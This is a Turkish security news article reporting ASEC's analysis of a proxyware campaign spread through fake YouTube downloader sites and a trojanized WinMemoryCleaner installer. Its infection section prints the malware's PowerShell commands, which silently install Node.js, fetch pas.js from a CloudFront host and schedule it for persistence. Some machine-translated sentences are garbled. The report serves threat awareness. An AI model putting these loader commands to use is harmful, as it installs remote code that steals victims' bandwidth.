Siber güvenlik araştırmacıları, son haftalarda proxyware kötü amaçlı yazılım sunmak için YouTube video indirme hizmetleri olarak maskelenen aldatıcı sitelerde bir artış gözlemlediler.
MP4 formatında video almak isteyen kurbanlar, “WinMemoryCleaner” adlı meşru bir yardımcı program için ara sıra indirme bağlantısı sunan reklam sayfaları aracılığıyla yeniden yönlendiriliyor.
Bununla birlikte, bu zararsız cephenin arkasında, sonuçta proxyware dağıtan ve sistemin ağ bant genişliğini gizlice köleleştiren çok aşamalı bir yükleyici yatar.
WinMemoryCleanerupdate.bat aracılığıyla bir güncelleme komut dosyasını tetiklemeden önce WinMemoryCleaner.exe’yi program dosyaları dizinine ilk indirme, setup.exe, açar.
Yürütüldükten sonra WinMemoryCleaner.exe, sanal makinelerden veya sanal alan analizinden kaçmak için ortam kontrolleri gerçekleştirir, ardından Node.js’i yükleyen ve uzak bir sunucudan kötü amaçlı bir JavaScript bileşenini yükleyen bir PowerShell yükünü çağırır.
.webp)
ASEC analistleri, bu tekniği önceki proxyware kampanyalarının rafine bir evrimi olarak tanımladı ve saldırganın aracı araçlara ev sahipliği yapmak için GitHub’a olan güvenini kaydetti.
Sonraki aşamalar, JavaScript’in periyodik olarak Node.js.
Bu komut dosyası, temel sistem bilgilerini bir komut ve kontrol sunucusuna iletir ve ek komut dosyalarının getirilmesini veya son proxyware kurulumunu başlatmayı içeren yönergeleri bekler.
.webp)
ASEC araştırmacıları, aktörün sadece DigitalPulse ve Honeygain proxyware dağıtmaktan Infatica’nın ajanını entegre etmek için bant genişliği hırsızlık yeteneklerini artırdığını belirtti.
Bu kampanyanın etkisi iki yönlüdür: etkilenen sistemler bozulmuş ağ performansı yaşar ve saldırgan, satış ortağı programları aracılığıyla çalınan bant genişliğinden para kazanır.
.webp)
Proxyware programları genellikle boş ağ verimini paylaşarak, son kullanıcılara ücret vaat eder, ancak com kurbanlara farkında olmadan bant genişliği tedarik etmeden vaat eder.
Güney Kore gibi akış hizmetlerinin yüksek benimsenmesine sahip bölgelerde, kampanyanın erişimi önemli ölçüde arttı ve büyük AV satıcılarından uyarılar sağladı.
Enfeksiyon mekanizması
Enfeksiyon mekanizmasının daha derin bir incelemesi, winMemoryCleaner.exe tarafından verilen PowerShell betiğinin önemli rolünü ortaya koymaktadır.
Komut dosyası, Node.js’in gizli bir kurulumuyla başlar:-
Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
Start-Process msiexec.exe -ArgumentList '/i',$env:TEMP + '\node.msi','/qn' -WaitNode.js yer aldıktan sonra, komut dosyası bir CloudFront URL’sinden pas.js indirir ve kaydeder:-
$jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"Node.js altındaki JavaScript bileşeninin sürekli yürütülmesi, dinamik güncellemeleri ve son yük dağıtımını sağlar ve eradikasyonu özel araçlar olmadan zorlaştırır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.